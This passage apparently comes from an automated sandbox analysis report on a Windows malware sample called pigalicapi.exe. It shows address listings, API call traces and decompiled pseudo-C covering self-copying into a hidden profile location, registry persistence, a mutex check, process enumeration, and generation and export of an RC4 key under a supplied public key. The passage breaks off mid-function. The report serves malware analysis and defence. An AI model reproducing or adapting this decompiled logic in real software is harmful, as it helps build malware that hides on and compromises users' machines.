                                                                                                                                                                                                                                                                                          0x04003c80
                                                                                                                                                                                                                                                                                          0x04003c85
                                                                                                                                                                                                                                                                                          0x04003c8c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                                          0x04003c98
                                                                                                                                                                                                                                                                                          0x04003c9e
                                                                                                                                                                                                                                                                                          0x04003cb1
                                                                                                                                                                                                                                                                                          0x04003cb3
                                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                                          0x04003cc9
                                                                                                                                                                                                                                                                                          0x04003ccb
                                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                                          0x04003ce3
                                                                                                                                                                                                                                                                                          0x04003ce5
                                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                                          0x04003cfd
                                                                                                                                                                                                                                                                                          0x04003cff
                                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                                          0x04003d15
                                                                                                                                                                                                                                                                                          0x04003d17
                                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                                          0x04003d26
                                                                                                                                                                                                                                                                                          0x04003d2f
                                                                                                                                                                                                                                                                                          0x04003d31
                                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                                          0x04003d40
                                                                                                                                                                                                                                                                                          0x04003d58
                                                                                                                                                                                                                                                                                          0x04003d60
                                                                                                                                                                                                                                                                                          0x04003d80
                                                                                                                                                                                                                                                                                          0x04003d88
                                                                                                                                                                                                                                                                                          0x04003da7
                                                                                                                                                                                                                                                                                          0x04003daf
                                                                                                                                                                                                                                                                                          0x04003db5
                                                                                                                                                                                                                                                                                          0x04003dbf
                                                                                                                                                                                                                                                                                          0x04003dc9
                                                                                                                                                                                                                                                                                          0x04003df3
                                                                                                                                                                                                                                                                                          0x04003df8
                                                                                                                                                                                                                                                                                          0x04003dfd
                                                                                                                                                                                                                                                                                          0x04003e0d
                                                                                                                                                                                                                                                                                          0x04003e2b
                                                                                                                                                                                                                                                                                          0x04003e30
                                                                                                                                                                                                                                                                                          0x04003e39
                                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                                          0x04003e49
                                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                                          0x04003e5a
                                                                                                                                                                                                                                                                                          0x04003e64
                                                                                                                                                                                                                                                                                          0x04003e75
                                                                                                                                                                                                                                                                                          0x04003e7d
                                                                                                                                                                                                                                                                                          0x04003e9e
                                                                                                                                                                                                                                                                                          0x04003ea3
                                                                                                                                                                                                                                                                                          0x04003eab
                                                                                                                                                                                                                                                                                          0x04003f8a
                                                                                                                                                                                                                                                                                          0x04003eb1
                                                                                                                                                                                                                                                                                          0x04003ecc
                                                                                                                                                                                                                                                                                          0x04003ed1
                                                                                                                                                                                                                                                                                          0x04003ed9
                                                                                                                                                                                                                                                                                          0x04003f81
                                                                                                                                                                                                                                                                                          0x04003edf
                                                                                                                                                                                                                                                                                          0x04003efa
                                                                                                                                                                                                                                                                                          0x04003eff
                                                                                                                                                                                                                                                                                          0x04003f07
                                                                                                                                                                                                                                                                                          0x04003f78
                                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                                          0x04003f22
                                                                                                                                                                                                                                                                                          0x04003f43
                                                                                                                                                                                                                                                                                          0x04003f48
                                                                                                                                                                                                                                                                                          0x04003f50
                                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                                          0x04003f60
                                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                                          0x04003f76
                                                                                                                                                                                                                                                                                          0x04003f7f
                                                                                                                                                                                                                                                                                          0x04003f88
                                                                                                                                                                                                                                                                                          0x04003f9a
                                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                                          0x04003fd7
                                                                                                                                                                                                                                                                                          0x04003fd9
                                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                                          0x04003fa5
                                                                                                                                                                                                                                                                                          0x04003fac
                                                                                                                                                                                                                                                                                          0x04003fc4
                                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                                          0x04003fce
                                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                                          0x04003ff4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04003ff4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Mvqcsgcuwwini,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(Mvqcsgcuwwini), ref: 04005AAE
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Mvqcsgcuwwini), ref: 04005AC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegCloseKey.KERNEL32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegCloseKey.KERNEL32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe$R+g$Vatwyovatk$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                                          • API String ID: 1389186475-2481894136
                                                                                                                                                                                                                                                                                          • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                          • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 744 4008800-4008811 745 4008817-400881b 744->745 746 400895c-4008962 744->746 745->746 747 4008821-4008843 CryptAcquireContextA 745->747 748 4008845-4008855 GetLastError 747->748 749 400887a-400887e 747->749 751 4008860-4008874 CryptAcquireContextA 748->751 752 4008857-400885e 748->752 749->746 750 4008884-40088b7 CryptGenKey 749->750 753 4008950-4008956 CryptReleaseContext 750->753 754 40088bd-40088d7 CryptExportKey 750->754 751->749 752->749 752->751 753->746 755 4008946-400894a CryptDestroyKey 754->755 756 40088d9-40088dd 754->756 755->753 757 400893f 756->757 758 40088df-40088e3 756->758 757->755 758->757 759 40088e5-40088e9 758->759 759->757 760 40088eb-40088ef 759->760 760->757 761 40088f1-4008914 CryptImportKey 760->761 762 4008916-4008937 CryptExportKey CryptDestroyKey 761->762 763 400893d 761->763 762->763 763->755
                                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                          			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				long* _v32;
                                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t42 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v28 = 0x80;
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                                          						_t43 = _v24;
                                                                                                                                                                                                                                                                                          						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          							_t46 = _a4;
                                                                                                                                                                                                                                                                                          							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                          								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                                          									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                                          									if(_t49 != 0) {
                                                                                                                                                                                                                                                                                          										_t51 = _v20;
                                                                                                                                                                                                                                                                                          										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                                                          										CryptDestroyKey(_v32); // executed
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x04008806
                                                                                                                                                                                                                                                                                          0x04008811
                                                                                                                                                                                                                                                                                          0x0400895c
                                                                                                                                                                                                                                                                                          0x04008962
                                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                                          0x04008831
                                                                                                                                                                                                                                                                                          0x0400883b
                                                                                                                                                                                                                                                                                          0x04008843
                                                                                                                                                                                                                                                                                          0x0400884b
                                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                                          0x04008869
                                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                                          0x0400887e
                                                                                                                                                                                                                                                                                          0x04008884
                                                                                                                                                                                                                                                                                          0x0400888b
                                                                                                                                                                                                                                                                                          0x0400889b
                                                                                                                                                                                                                                                                                          0x040088a2
                                                                                                                                                                                                                                                                                          0x040088af
                                                                                                                                                                                                                                                                                          0x040088b7
                                                                                                                                                                                                                                                                                          0x040088c1
                                                                                                                                                                                                                                                                                          0x040088cf
                                                                                                                                                                                                                                                                                          0x040088d7
                                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                                          0x0400893f
                                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                                          0x0400890c
                                                                                                                                                                                                                                                                                          0x04008914
                                                                                                                                                                                                                                                                                          0x04008926
                                                                                                                                                                                                                                                                                          0x0400892a
                                                                                                                                                                                                                                                                                          0x04008930
                                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                                          0x0400893d
                                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400887e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                                                                                                                          			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                                                                                                          				long _v284;
                                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                                          				void* _v308;
                                                                                                                                                                                                                                                                                          				void* _v312;
                                                                                                                                                                                                                                                                                          				long _v316;
                                                                                                                                                                                                                                                                                          				long _v320;
                                                                                                                                                                                                                                                                                          				void* _v324;
                                                                                                                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                                                                                                                          				int _v332;
                                                                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                                          				_v312 = _t44;
                                                                                                                                                                                                                                                                                          				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          					L18:
                                                                                                                                                                                                                                                                                          					return _v5;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v308 = 0x128;
                                                                                                                                                                                                                                                                                          				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                                          				if(_t47 == 0) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					CloseHandle(_v312);
